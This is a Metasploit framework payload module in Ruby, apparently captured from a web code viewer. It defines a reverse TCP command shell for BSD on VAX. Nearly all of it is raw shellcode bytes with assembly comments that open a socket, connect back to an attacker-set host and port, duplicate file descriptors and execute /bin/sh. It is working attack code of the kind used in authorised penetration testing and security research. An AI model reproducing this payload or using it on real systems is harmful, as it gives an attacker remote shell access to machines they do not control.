Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 100
10

11
  # This is so one-off that we define it here
12
  ARCH_VAX = 'vax'
13

14
  include Msf::Payload::Single
15
  include Msf::Sessions::CommandShellOptions
16

17
  def initialize(info = {})
18
    super(merge_info(info,
19
      'Name'        => 'BSD Command Shell, Reverse TCP Inline',
20
      'Description' => 'Connect back to attacker and spawn a command shell',
21
      'Author'      => 'wvu',
22
      'License'     => MSF_LICENSE,
23
      'Platform'    => 'bsd',
24
      'Arch'        => ARCH_VAX,
25
      'Handler'     => Msf::Handler::ReverseTcp,
26
      'Session'     => Msf::Sessions::CommandShellUnix,
27
      'Payload'     => {
28
        'Offsets'   => {
29
          'LHOST'   => [24, 'ADDR'],
30
          'LPORT'   => [32, 'n']
31
        },
32
        'Payload'   =>
33
          "\xdd\x00" +                 # pushl  $0
34
          "\xdd\x01" +                 # pushl  $1
35
          "\xdd\x02" +                 # pushl  $2
36
          "\xdd\x03" +                 # pushl  $3
37
          "\xd0\x5e\x5c" +             # movl   sp,ap
38
          "\xbc\x8f\x61\x00" +         # chmk   $61
39
          "\xd0\x50\x5a" +             # movl   r0,r10
40
          "\xdd\x00" +                 # pushl  $0
41
          "\xdd\x00" +                 # pushl  $0
42
          "\xdd\x8f\x00\x00\x00\x00" + # pushl  LHOST
43
          "\xdd\x8f\x02\x00\x00\x00" + # pushl  AF_INET + LPORT
44
          "\xd0\x5e\x5b" +             # movl   sp,r11
45
          "\xdd\x10" +                 # pushl  $10
46
          "\xdd\x5b" +                 # pushl  r11
47
          "\xdd\x5a" +                 # pushl  r10
48
          "\xdd\x03" +                 # pushl  $3
49
          "\xd0\x5e\x5c" +             # movl   sp,ap
50
          "\xbc\x8f\x62\x00" +         # chmk   $62
51
          "\xd0\x00\x5b" +             # movl   $0,r11
52
          "\xdd\x5b" +                 # pushl  r11
53
          "\xdd\x5a" +                 # pushl  r10
54
          "\xdd\x02" +                 # pushl  $2
55
          "\xd0\x5e\x5c" +             # movl   sp,ap
56
          "\xbc\x8f\x5a\x00" +         # chmk   $5a
57
          "\xf3\x02\x5b\xef" +         # aobleq $2,r11,dup2
58
          "\xdd\x8f\x2f\x73\x68\x00" + # pushl  $68732f
59
          "\xdd\x8f\x2f\x62\x69\x6e" + # pushl  $6e69622f
60
          "\xd0\x5e\x5b" +             # movl   sp,r11
61
          "\xdd\x00" +                 # pushl  $0
62
          "\xdd\x00" +                 # pushl  $0
63
          "\xdd\x5b" +                 # pushl  r11
64
          "\xdd\x03" +                 # pushl  $3
65
          "\xd0\x5e\x5c" +             # movl   sp,ap
66
          "\xbc\x3b"                   # chmk   $3b
67
      }
68
    ))
69
  end
70

71
end
72

73